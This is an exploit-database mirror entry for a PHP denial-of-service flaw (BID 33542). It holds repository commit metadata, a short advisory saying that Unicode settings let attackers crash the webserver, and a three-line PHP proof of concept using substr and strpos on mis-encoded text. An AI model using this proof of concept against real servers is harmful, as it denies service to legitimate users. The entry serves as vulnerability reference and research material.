exploit-db-mirror/exploits/php/dos/32769.php
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

10 lines
No EOL
404 B
PHP

source: https://www.securityfocus.com/bid/33542/info
PHP is prone to a denial-of-service vulnerability because it fails to limit global scope for certain settings relating to Unicode text operations.
Attackers can exploit this issue to crash the affected webserver, denying service to legitimate users.
<?php
$v = 'Òîâà å òåñò|test.php';
print substr($v,0,strpos($v,'|'));
?>